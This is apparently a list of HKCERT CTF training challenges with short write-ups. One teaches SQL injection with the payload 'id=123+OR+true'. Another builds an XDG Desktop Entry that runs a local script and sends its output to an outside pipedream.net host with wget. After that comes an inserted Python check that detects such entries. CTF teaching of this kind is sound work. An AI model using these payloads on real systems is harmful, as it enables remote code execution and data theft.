* Challenges are from previous competitions
* You can find all writeups (solutions) on GitHub.
2024 /b6a.black
Only the admin can read the flag. Can you read the data in /flag.php?
Attachment: leaked-secret_594f8d5f5dd0014276c395f4677e9649.zip
Can you guess the passcode?
Scratch Link: https://scratch.mit.edu/projects/738468454/
What you need is to read the locked blog post. That's it.
http://training.hkcert24.pwnable.hk:20003
Attachment: elb-ii_0cdab7dd68e82bb14dd59bfdf071dcbd.zip
If you can solve CrackMe in 2020, then you can solve it too, probably.
Attachment: crackme_00e6609f485d9ffafe3a0d21273979c3.zip
If you can solve it slowly, you can solve it quickly too.
To fill, or not to fill, that is the question.
You can find the flag in the questionnaire.
Hack the admin panel
I wrote a simple shellcode interpreter! Try to read the flag in the file /flag.
Attachment: shellcode-runner_f0f077bf6f6ee74930566384214e6f5c.zip
nc training.hkcert24.pwnable.hk 20007
When I was searching for binary exploitation samples, I found this from hkcert ctf 2020. I made some small fixes to the game; see if you can still pwn this and steal $1000000 from me!
Attachment: absolute-gambler_a34e7244ab1107e7edbacf541c224504.zip
nc training.hkcert24.pwnable.hk 20008
Do you know the Caesar cipher? The Vigenère cipher is one of its variants. I will feel safe if the key is longer than the plaintext.
Now I am going to repeatedly send you my encrypted password. You can't recover my password, can you?
Attachment: classic-one-time-pad_b0865470e76270c659fac80e77ef4e36.zip
nc training.hkcert24.pwnable.hk 28109
The post-it for the key encrypting the flag is missing. Now I can only regenerate the flag using this.... Wait, did I use that much time to generate the key?
You need a key to open the door... but what if the key is in the room?
http://training.hkcert24.pwnable.hk:28251
Attachment: catch-22_98e4dcdc123f3f69385f664e3e3c5baa.zip
Solution: https://hackmd.io/@blackb6a/hkcert-ctf-2022-ii-en-6a196795
Knowing all along I could not win,
I squeeze out laughs and play the comedian;
unable to be the elite you all admire,
a clown lucky enough to make a fool of himself still pays his respects.
In the beginning of 2020, Khaled A. Nagaty invented a cryptosystem based on key exchange. The cipher is faster than ever... It is impossible to break, right?
Attachment: a-joke-cipher_58178adf8b732db76116f5bb7e0c4198.zip
To solve this challenge, you need to read the source code chall.py. Try to get these questions answered:
* How is shared_key generated from y_A and y_B?
* How do you compute m from c and shared_key?
* How do you convert m into a flag in the format hkcert21{...}?
Flag 1: Read /flag1
Web: http://training.hkcert24.pwnable.hk:28039
Attachment: spyce_222c677640e7721636b146c58425aee3.zip
Solution: https://hackmd.io/@blackb6a/hkcert-ctf-2022-i-en-3f8a9ef6
I heard perfect shuffle is reproducible...
Attachment: shuffle_03f016d972f11c15bb25d038a2bd6bb3.zip
Hint: What is a .pyc file? Are there tools for reverting a .pyc to some readable source (maybe back to a Python script)?
Find out Squirrel Master's password!
Web: http://training.hkcert24.pwnable.hk:20015
This is an easy web challenge on SQL injection, a common vulnerability, especially in old applications. An experienced player or pentester is expected to solve it within 5 minutes, but if you're new to this game, read on!
To find abnormalities (bugs / vulnerabilities) in a web application, you first need to understand its behavior under normal usage. Visit the homepage (http://training.hkcert24.pwnable.hk:20015) and you will see a cute squirrel saying hi to you, with a big button to Join the community. The other links on the webpage are either out of scope (not on the same website) or simply not functioning. So let's click that button.
In the SquirrelChat application, we can see there are two functions: Login and Register. After registering an account and logging in to the application, we can see that there are additional functions, Chatroom and Logout, with lengthy (but not helpful) text on the homepage.
Click into the chatroom, and you can see a textbox allowing you to send a message to the channel. Try sending something!
[🤔1]: There are two more functions in the application, can you find them?
You should already know the content in this section if you're familiar with the web.
Similar to most websites in the world, the site you're visiting consists of two parts: client and server. The server 'serves' you by processing your request and providing webpages, images, videos etc. for your browser. The client is your web browser, which sends requests to the server and displays the response on your screen.
[🤔2]: What is your browser software, and what is the server software?
💡: Google "What is my browser", "How to find out website server software"
When you send a message, your browser will send a request to the server chalf.hkcert21.pwnable.hk:28062, with your chat message and other input values. The server will process your message and show it on every user's webpage as output.
[🤔3]: What are the inputs when you send a message in SquirrelChat?
Path and query string are examples of input to websites. When you do a Google search, you can notice that the web browser's address bar contains a URL (web address):
https://www.google.com/search?q=What+is+query+string
Server: www.google.com
Path: /search
Query string: q=What+is+query+string
[🤔4]: What does + mean in a query string? 💡: Google it: what does plus mean in query string
[🤔5]: Can you change the above Google URL to search something else? Test with your web browser.
[🤔6]: Send a message in the SquirrelChat chat room, then click on your own name. Can you identify the path and query string from your browser's address bar?
As mentioned, the SquirrelChat application has a SQL injection vulnerability. The application uses SQL to store and retrieve your account details and channel messages on the server, and user input is handled incorrectly when it constructs the SQL query. Therefore it is possible to change the website's behavior and leak flags from the server.
[🤔7]: In [🤔6], you identified the query string of the URL. What do the numbers in the query string mean? Try changing them and see how the application behaves.
The SquirrelChat application constructs the SQL query like this:
SELECT * FROM users WHERE id=<Your Input>
In the above SQL query, <Your Input> is replaced with the id provided in the query string. In plain English, this SQL query will SELECT (retrieve) user information where the user id equals your input in the query string.
So if you visit
http://training.hkcert24.pwnable.hk:20015/chat/user?id=123
the query will become:
SELECT * FROM users WHERE id=123
which shows the information of the user whose id equals 123. This code snippet looks completely innocent, but it is vulnerable to the deadly SQL injection vulnerability.
Let's look up what the SQL injection vulnerability is. Google what is sql injection ctf and you can find this webpage as the top result.
[🤔8]: You got all the pieces to tackle this challenge. Can you exploit the SQL injection vulnerability without looking at the answer below?
Suppose we are able to change the SQL query to the following:
SELECT * FROM users WHERE id=123 OR true
By visiting the profile of user 123, we know that the user does not exist (i.e. id=123 is False). By appending OR true to the query, we change the outcome to True regardless of what is provided as id, so the system will return EVERY user in the system, including our target: Squirrel Master's account. Recall your Math lessons:
OR Truth Table
+-----+-----+--------+
| A | B | A OR B |
+-----+-----+--------+
| T | T | T |
| T | F | T |
| F | T | T | <--- We are here
| F | F | F |
+-----+-----+--------+
[🤔9]: Can we construct the query string (input to the webpage) such that the application will run the above SQL query?
As you answered in [🤔4], we have to change spaces into plus signs (+) in the query string. Therefore, you can send the query string as id=123+OR+true and get your flag.
The + sign has a semantic meaning in the query string: it is used to represent a space. https://stackoverflow.com/a/6855723
Web: http://training.hkcert24.pwnable.hk:20016
Attachment: infantbrowser_6939c231042fd155a512940cd0982f76.zip
What if someone uses wget as the browser?
Flag: find the flag in the root directory with the name /proof*.sh
The objective of this kind of challenge is to send a malicious webpage / URI to steal sensitive information or even execute arbitrary code on the victim's machine. Unlike XSS, where the impact is limited to the victim's account on a particular website, a browser / desktop app exploit, or a client-side attack in general, may compromise the victim's entire machine.
In this challenge, we are allowed to send the victim an arbitrary URI and they will open it with xdg-open (just like clicking on links in a browser). To trick a victim into executing arbitrary code, we can craft an XDG Desktop Entry, which can specify what command is to be executed.
But before we can trick the victim into opening the Desktop Entry, we need to write the Desktop Entry somewhere in the local filesystem. This can be done since the victim is using wget as the browser, and the current working directory is writable.
For example, you can upload a Desktop Entry file named example.desktop to your website (e.g. a GitHub page), and then ask the victim bot to download it:
[Desktop Entry]
Exec=sh -c "wget https://xxxxxxxxxxxxxxx.m.pipedream.net/?`/proof*.sh`"
Type=Application
If this Desktop Entry is opened, it will execute the command after Exec=, which will first execute /proof*.sh and obtain the output, and then execute wget https://xxxxxxxxxxxxxxx.m.pipedream.net/?(the output from executing /proof*.sh), which allows you to capture the flag.
Once the example.desktop file is written, you can ask the victim bot to open file:///tmp/example.desktop so that they will execute the code you planted before.
But make sure you use a unique filename for the Desktop Entry file, since the challenge platform is shared by every participant.
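A defensive counterpart to the Desktop Entry trick described above, as an added example that is not part of the writeup: a small parser for the [Desktop Entry] group plus a check that flags an Exec= line which hands an inline command string to a shell. Both entries are constructed samples, and the collector host is a placeholder.

```python
"""Added example (not the challenge's own code): a defensive check for a
downloaded XDG Desktop Entry of the kind the writeup describes, flagging an
Exec= line that hands an inline command string to a shell."""
import re

# Constructed sample modelled on the writeup's pattern; the host is a placeholder.
SUSPICIOUS_ENTRY = """[Desktop Entry]
Exec=sh -c "wget https://collector.example.invalid/?`/proof*.sh`"
Type=Application
"""

# Constructed benign entry for comparison: a plain launcher, no shell wrapper.
BENIGN_ENTRY = """[Desktop Entry]
Name=Text Editor
Exec=gedit %U
Type=Application
"""

SHELL_WRAPPERS = {"sh", "bash", "dash", "zsh"}


def parse_desktop_entry(text: str) -> dict:
    """Return the key=value pairs of the [Desktop Entry] group, skipping blank
    lines, comments and any other groups in the file."""
    keys, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            keys[key.strip()] = value.strip()
    return keys


def exec_risk(text: str) -> str:
    """Return 'shell-inline' when Exec= launches a shell with -c and the command
    string contains command substitution or a downloader, otherwise 'ok'."""
    exec_line = parse_desktop_entry(text).get("Exec", "")
    tokens = exec_line.split()
    if len(tokens) >= 3 and tokens[0].rsplit("/", 1)[-1] in SHELL_WRAPPERS and tokens[1] == "-c":
        body = exec_line.split("-c", 1)[1]
        if re.search(r"`|\$\(|\b(wget|curl)\b", body):
            return "shell-inline"
    return "ok"


if __name__ == "__main__":
    for name, entry in (("suspicious", SUSPICIOUS_ENTRY), ("benign", BENIGN_ENTRY)):
        print(name, "->", exec_risk(entry))
```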
Too easy for you? Now you can try babyURIi...
You got the source code already, now what do you want? Dockerfile?
nc training.hkcert24.pwnable.hk 20017
Looks like the binary contains no flag.....
Can you help us find the flag? There are only weird strings inside....
Attachment: scattered_605e04699fe3f83e375fc02c4ba09fe2.zip
Please reverse engineer and deactivate the time bomb set by Mr. Robot.
Submit the deactivation key as the flag.
Attachment: timebomb_20799fed87d97c7a9b7fcd00af5a21e8.zip
Have you ever played Little Fighter 2? I have modified stage.dat to make the game more interesting. Of course, I hid a flag inside, too.
Attachment: lf2_3c15eea6088ec0491715966045ee71bd.zip
Is your sanity enough? I'm afraid you are unable to face the upcoming challenges...
Seccomp is a Linux kernel feature that restricts a program from executing unexpected syscalls. Can you break it?
nc training.hkcert24.pwnable.hk 20023
Attachment: jail-of-seccomp_0ce66def375a919a5de8cdc782627c63.zip
Give me the expression and I will return the answer.
nc training.hkcert24.pwnable.hk 20024
Attachment: python-calculator_15828ce780ab47a9a42e3c5ad5651aaa.zip
You lose everything, including your chance of getting out of the Python jail.
nc training.hkcert24.pwnable.hk 20025
Attachment: all-missing_f7be93352498ebd158a0a9fc069b30e9.zip
Jack is testing his botnet, what could go wrong?
Attachment: jack-botnet-service-1_064a2bd6bb9036f6e8788d8418e18300.zip
Long story short,
but it feels too short;
or perhaps the true meaning
need not be spelled out.
Mystiz made a key vault which can encrypt his darkest secrets (i.e., the flag). Everything is protected with bank-level encryption (i.e., a 256-bit key). You are welcome to look at the encrypted secrets and praise his cryptographic knowledge.
nc training.hkcert24.pwnable.hk 20029
Attachment: long-story-short_55e7b1b931d8aaa5670e38b1e14c82ea.zip
Freedom where's our freedom?
Freedom what would it be
Can you tell me what's the reason?
Reason that meant to be
Even the slightest mistake in cryptography can lead to a disastrous result. Let's see what happens when you allow end-users to pick the mode of operation...
nc training.hkcert24.pwnable.hk 20030
Attachment: freedom_ff0173b179d746386dca0e93e6c00d47.zip
I have accidentally formatted my SD card. Please help me recover the photo inside 🙏.
Attachment: sdcard_f88edd62fb9d6f66b9bcab4497ca23b9.zip
Solution: https://hackmd.io/@blackb6a/hkcert-ctf-2022-i-en-3f8a9ef6
Solution (Chinese): https://hackmd.io/@blackb6a/hkcert-ctf-2022-i-zh-3f8a9ef6